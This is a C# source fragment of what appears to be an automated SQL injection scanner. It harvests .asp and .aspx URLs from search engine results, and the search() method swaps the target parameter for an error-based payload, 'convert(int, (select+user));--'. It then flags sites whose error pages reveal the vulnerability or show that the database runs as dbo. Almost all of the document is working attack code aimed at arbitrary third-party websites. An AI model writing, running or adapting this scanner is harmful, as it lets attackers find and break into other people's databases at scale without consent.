public void search()
{
for (int nIndex = nIndexStart; nIndex <= nIndexEnd; nIndex++)
{
string sUrl = oFrmMain.getSearchUrlList()[nIndex];
// Replace param to vulnerable parameter -> convert(int, (select+user));--
int nPos = sUrl.IndexOf(oFrmMain.getSearchEngineParam() + "=");
string sParamValue = sUrl.Substring(nPos + oFrmMain.getSearchEngineParam().Length + 1);
sUrl = sUrl.Replace("=" + sParamValue, "=" + Global.GLOBAL_PARAM_SEARCH_ENGINE_VULN_VALUE);
CustomWebClient oWebClient = new CustomWebClient(nTimeout);
string sHtmlResult;
try {
sHtmlResult = oWebClient.DownloadString(sUrl);
} catch (WebException oWebException) {
try {
StreamReader oStreamReader = new StreamReader(((HttpWebResponse)oWebException.Response).GetResponseStream());
sHtmlResult = oStreamReader.ReadToEnd();
} catch (Exception) { sHtmlResult = String.Empty; }
}
if (sHtmlResult.ToLower().Contains(Global.GLOBAL_RESPONSE_SEARCH_ENGINE_VULN_SENTENCE.ToLower()))
{
Boolean bIsDboUser;
if (sHtmlResult.ToLower().Contains(Global.GLOBAL_RESPONSE_SEARCH_ENGINE_VULN_DBO_USER))
{
bIsDboUser = true;
}
else
{
bIsDboUser = false;
}
oFrmMain.refreshVulnResults(sUrl, bIsDboUser);
}
oWebClient = null;
oFrmMain.refreshVulnProgressBar();
}
}
private void searchUrls(int nPageNumber)
{
int nSeed = ((nPageNumber * 10) + 1);
CustomWebClient oWebClient = new CustomWebClient(nTimeout);
string sHtmlResult;
try {
sHtmlResult = oWebClient.DownloadString(oFrmMain.getSearchEngineUrl() + nSeed.ToString());
} catch (WebException oWebException) {
try {
StreamReader oStreamReader = new StreamReader(((HttpWebResponse)oWebException.Response).GetResponseStream());
sHtmlResult = oStreamReader.ReadToEnd();
} catch (Exception) { sHtmlResult = String.Empty; }
}
oWebClient = null;
// Search 10 results
for (int i = 0; i < 10; i++)
{
// Find a valid link
string sLink = "link-" + (i + 1);
if (sHtmlResult.Contains(sLink))
{
string sHtmlResultLink = sHtmlResult.Substring(sHtmlResult.IndexOf(sLink));
int nPosLinkHrefStart = sHtmlResultLink.IndexOf("href=\"") + 6;
int nPosLinkHrefLength = sHtmlResultLink.Substring(nPosLinkHrefStart).IndexOf("\"");
string sUrl = sHtmlResultLink.Substring(nPosLinkHrefStart, nPosLinkHrefLength);
// Check if url is valid
string sParamToSearch;
if (oFrmMain.getTxtSearchEngineParam().Length > 0)
{
sParamToSearch = oFrmMain.getTxtSearchEngineParam();
}
else
{
sParamToSearch = Global.GLOBAL_PARAM_SEARCH_ENGINE_SEARCH_DEFAULT_VALUE_1;
}
string sPage;
if (oFrmMain.getRbSearchEnginePages1IsChecked())
{
sPage = ".asp?";
}
else
{
sPage = ".aspx?";
}
if (sUrl.ToLower().Contains(sPage + sParamToSearch.ToLower() + "="))
{
oFrmMain.refreshSearchURLResults(sUrl);
}
}
oFrmMain.refreshSearchURLProgressBar();
}
}